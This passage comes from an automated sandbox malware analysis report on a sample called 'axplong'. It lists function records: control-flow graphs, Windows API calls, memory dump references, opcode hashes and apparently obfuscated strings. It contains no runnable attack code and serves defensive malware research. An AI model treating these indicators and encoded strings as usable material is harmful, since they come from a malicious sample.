                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: PathTemp
                                • String ID:
                                • API String ID: 2920410445-0
                                • Opcode ID: 2909613e9c1b985785a5c19bbbc8ea55760d0960b16a6af1d0ab6b6db1c02b7f
                                • Instruction ID: 8904324fea316ef98e2ce6ae30cd29ab153a5a0170d3ceb240425326bff530ac
                                • Opcode Fuzzy Hash: 2909613e9c1b985785a5c19bbbc8ea55760d0960b16a6af1d0ab6b6db1c02b7f
                                • Instruction Fuzzy Hash: 2051C0719011589BEB28DB28CC89BEDBB75FB85314F0081D9E449A72C2DB755F85CF90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1536 536c99-536ca5 1537 536ca7-536cc3 call 537430 call 537443 call 536b8a 1536->1537 1538 536cc4-536ce8 call 534020 1536->1538 1544 536d06-536d28 CreateFileW 1538->1544 1545 536cea-536d04 call 537430 call 537443 call 536b8a 1538->1545 1546 536d2a-536d2e call 536e01 1544->1546 1547 536d38-536d3f call 536d77 1544->1547 1567 536d72-536d76 1545->1567 1554 536d33-536d36 1546->1554 1559 536d40-536d42 1547->1559 1554->1559 1561 536d64-536d67 1559->1561 1562 536d44-536d61 call 534020 1559->1562 1565 536d70 1561->1565 1566 536d69-536d6f 1561->1566 1562->1561 1565->1567 1566->1565
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 068bc8ad39e7bd53c31911f9409bae99fbaee4289db30166bfc69707997480fa
                                • Instruction ID: 8c770c1aa29d291844581583408f1a6f9788c6c620497a878ab41ea57288c11d
                                • Opcode Fuzzy Hash: 068bc8ad39e7bd53c31911f9409bae99fbaee4289db30166bfc69707997480fa
                                • Instruction Fuzzy Hash: E5210A72A012097BEF217B649C46B9F3F69BF81338F608714F9247B1D1DB706E0596A2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1570 536f71-536f87 1571 536f97-536fa7 1570->1571 1572 536f89-536f8d 1570->1572 1577 536fe7-536fea 1571->1577 1578 536fa9-536fbb SystemTimeToTzSpecificLocalTime 1571->1578 1572->1571 1573 536f8f-536f95 1572->1573 1574 536fec-536ff7 call 51cf21 1573->1574 1577->1574 1578->1577 1580 536fbd-536fdd call 536ff8 1578->1580 1582 536fe2-536fe5 1580->1582 1582->1574
                                APIs
                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00536FB3
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$LocalSpecificSystem
                                • String ID:
                                • API String ID: 2574697306-0
                                • Opcode ID: 6f9f86c57d1240e160294a17c06028d2c15edb2b61a95791d3abee5bac848bf4
                                • Instruction ID: a9b87c387d2607d8102bcab685a9d9950dc7bc935a1f356b96cb7c053dc6ecc6
                                • Opcode Fuzzy Hash: 6f9f86c57d1240e160294a17c06028d2c15edb2b61a95791d3abee5bac848bf4
                                • Instruction Fuzzy Hash: 6711ECB290020DBADB10DED5D944EDFBBBCAB48314F509266E516E7184EB30EB48CB61

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1583 53d6ef-53d6fa 1584 53d708-53d70e 1583->1584 1585 53d6fc-53d706 1583->1585 1587 53d710-53d711 1584->1587 1588 53d727-53d738 RtlAllocateHeap 1584->1588 1585->1584 1586 53d73c-53d747 call 537443 1585->1586 1593 53d749-53d74b 1586->1593 1587->1588 1589 53d713-53d71a call 539c81 1588->1589 1590 53d73a 1588->1590 1589->1586 1596 53d71c-53d725 call 538cf9 1589->1596 1590->1593 1596->1586 1596->1588
                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0053A5ED,?,005374AE,?,00000000,?), ref: 0053D731
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: bcac9d4edac13e5b346e692caa6a32449cd573a534177a23ab16fb65c4c0018c
                                • Instruction ID: 5bc0b736eaf1cb5ddaf4563fb4095f8ce77bb6c30edb2bdac401f6d6845335e2
                                • Opcode Fuzzy Hash: bcac9d4edac13e5b346e692caa6a32449cd573a534177a23ab16fb65c4c0018c
                                • Instruction Fuzzy Hash: 3EF0E931A09225669F222A657C05BAB7FB9FF817B0F184511FC04DA181DA60EC0042F0
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 752c03ea421ea8f1bf85f8b0784134948e98f61047b0046f9f7bcbd77f169fd8
                                • Instruction ID: 49f0d4dddb2a610f09b548127b736402b81947cf16277c1a29047ca39beb9b02
                                • Opcode Fuzzy Hash: 752c03ea421ea8f1bf85f8b0784134948e98f61047b0046f9f7bcbd77f169fd8
                                • Instruction Fuzzy Hash: 47F0D171E00A08BBC700BBAC9C0EB5E7F74FB47760F800348E811672E1EA745A048BD2
                                Memory Dump Source
                                • Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c72e7de4bbf51285b8ab1934b2c54f4a2718586e0cb87b7204270088f2dd6d55
                                • Instruction ID: 5e49db80a39617d0325d7619cbac62926693a14fedc703b925a4600199d7d6b9
                                • Opcode Fuzzy Hash: c72e7de4bbf51285b8ab1934b2c54f4a2718586e0cb87b7204270088f2dd6d55
                                • Instruction Fuzzy Hash: 8F118C7B64D1426EC70299A46A00BF67F6FBBD7330324C066F4429B482F6919A0772E0
                                Memory Dump Source
                                • Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 77f7f75da3470c9ede0f052eedaa2475eda9da7ec5c6576c37e3eaf5cc88b918
                                • Instruction ID: 6078fb1d7a598310da59ac1894a875877133267c27ce7c0a3a63674ddb301118
                                • Opcode Fuzzy Hash: 77f7f75da3470c9ede0f052eedaa2475eda9da7ec5c6576c37e3eaf5cc88b918
                                • Instruction Fuzzy Hash: B201CEB330D115AFD3036520AA44BB97D5ABBC3330725C03AF047CB582FB54A407B122
                                Memory Dump Source
                                • Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be0aadcd81347b6f39af53ab312ed13c49d3caf6581bc5745e6ff1f1e03e24da
                                • Instruction ID: fe118910e2fd2045ad6987f471786cb335344c4b24fb51411da6bbbda32e343c
                                • Opcode Fuzzy Hash: be0aadcd81347b6f39af53ab312ed13c49d3caf6581bc5745e6ff1f1e03e24da
                                • Instruction Fuzzy Hash: 0B0126BB34E115BE83031551BB44BFA7A6BA7D7330320C026B40BD7682FEA466477262
                                Memory Dump Source
                                • Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1132e23723745f59de2c00acd0687f2bf060b8ba368dd185ea9441c8697272ae
                                • Instruction ID: 10f035e4e43d36bad21846d786e34b06d25743b5d665faf0920411f5c3ffac64
                                • Opcode Fuzzy Hash: 1132e23723745f59de2c00acd0687f2bf060b8ba368dd185ea9441c8697272ae
                                • Instruction Fuzzy Hash: E6F0E2BB24E411BE93025960BB04BFA796FB7D6330720C426F847C7581FFA465477162
                                Memory Dump Source
                                • Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 19fa1a69b601a1fd73cc6370a0e552c5c56d65cdf2ac9c025915d695f03bd1b6
                                • Instruction ID: 394d98291a66332706f02b305a87ab5595b041ce426782a768fd90584831d209
                                • Opcode Fuzzy Hash: 19fa1a69b601a1fd73cc6370a0e552c5c56d65cdf2ac9c025915d695f03bd1b6
                                • Instruction Fuzzy Hash: B0F0E9B734D505EF83069E54F601BB67AABBBD9320310C429F407C7151EE706513B165
                                Memory Dump Source
                                • Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8c4dd96c183ea6974a37f91f836cf4f3b80a1e16d82ab237be1bab78539770d2
                                • Instruction ID: f4c86d75a97b61bb6b7b07ce769884b76e90902810e1aaedc3239c6fe53ab17a
                                • Opcode Fuzzy Hash: 8c4dd96c183ea6974a37f91f836cf4f3b80a1e16d82ab237be1bab78539770d2
                                • Instruction Fuzzy Hash: 7DF0A7B724D515BE93029954BA04FB6796FB7D5330710C425B80BC7541FF606547B161
                                Memory Dump Source
                                • Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40e7726b364972192ed7617a98f6731426144f1e9a39cd689fd6e7ded59a2680
                                • Instruction ID: 7f93928a11ab249f7d2ccab4d337faa0e98ea038bb04f847af5fa6eaf40410a3
                                • Opcode Fuzzy Hash: 40e7726b364972192ed7617a98f6731426144f1e9a39cd689fd6e7ded59a2680
                                • Instruction Fuzzy Hash: 4AE02BB324D104BF47026AE4E600BB67E6F7799320700C125B807D7481FE612502B151
                                Memory Dump Source
                                • Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0aa25e6e91f444fe3311efba704455f99597e5838aa24be585b6e57ab0d88cf0
                                • Instruction ID: 2d0f182786498329a2ccb571c0f51aa22035fed8bbe83b5e64bd228f0700564d
                                • Opcode Fuzzy Hash: 0aa25e6e91f444fe3311efba704455f99597e5838aa24be585b6e57ab0d88cf0
                                • Instruction Fuzzy Hash: 68E09B73349019BEDB436E54E9006F67E2BB785720700C115F40687584EF716106B251
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$d4V$fed3aa
                                • API String ID: 0-2274789073
                                • Opcode ID: 28902b3848fc4968e2f3468de66dbbe18d754f4711eccc3997a468f2139060fd
                                • Instruction ID: b178425726d83e1b9a71338d732b61805a84e5db57127410a4879ee04a1f1200
                                • Opcode Fuzzy Hash: 28902b3848fc4968e2f3468de66dbbe18d754f4711eccc3997a468f2139060fd
                                • Instruction Fuzzy Hash: E372C570904248EBEF14EF68C94A7DE7FB6BB45304F608598E805673C2D7759A88CBD2
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: __floor_pentium4
                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                • API String ID: 4168288129-2761157908
                                • Opcode ID: c4c63adf420c7c2cd54dcb2ce0b9f79390bc6725da5251981805aba28e717e9c
                                • Instruction ID: bfdd4fe961b01e3f7f6df0cb012bc41310a6f7e2b6a411f7e7373f5a2429892d
                                • Opcode Fuzzy Hash: c4c63adf420c7c2cd54dcb2ce0b9f79390bc6725da5251981805aba28e717e9c
                                • Instruction Fuzzy Hash: B3C24C71E086298FDB24CE28DD447E9BBB5FB88309F1445EAD84DE7250E774AE858F40
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                • Instruction ID: 8eeb8b2e360b9682475a1c01b0e2c3aaa91d9d791b5206e88ea0eb9598dda164
                                • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                • Instruction Fuzzy Hash: 8BF14F71E002299FDF14CFA9C8806EDBBB5FF88318F558269E819A7345D731AE45CB90
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 0050247E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___std_exception_copy
                                • String ID: 'kQd+V$'kQd+V
                                • API String ID: 2659868963-1841753910
                                • Opcode ID: c62617b7fb22bec55b79495b31b370219253e0c585de0884eab6e0064a63e2b8
                                • Instruction ID: a06685a7e3943cab60054c9b5a514b072fb1e5464042fccae856ed6badf6c4f1
                                • Opcode Fuzzy Hash: c62617b7fb22bec55b79495b31b370219253e0c585de0884eab6e0064a63e2b8
                                • Instruction Fuzzy Hash: 5251D3B2900605CFEB15CF58E8957EEBBF4FB58310F24866AD405EB250E3749984CFA0
                                APIs
                                • GetSystemTimePreciseAsFileTime.KERNEL32(?,0051CE82,?,?,?,?,0051CEB7,?,?,?,?,?,?,0051C42D,?,00000001), ref: 0051CB33
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_500000_axplong.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$FilePreciseSystem
                                • String ID:
                                • API String ID: 1802150274-0
                                • Opcode ID: 920779bd532532a48f00e10f8347e461fb7f6acace8c0b236c9dd1c016e617a5
                                • Instruction ID: 41f7c8b25c74e7a2d86973a923b5e6c75c2f6b06fcfdbe3f7b9e9f2d870ab94a
                                • Opcode Fuzzy Hash: 920779bd532532a48f00e10f8347e461fb7f6acace8c0b236c9dd1c016e617a5
                                • Instruction Fuzzy Hash: A7D02232586138A3CA012B94FC04CEEBF08AB00B207802211E808A3520CE927C80ABD1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true
                                • Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
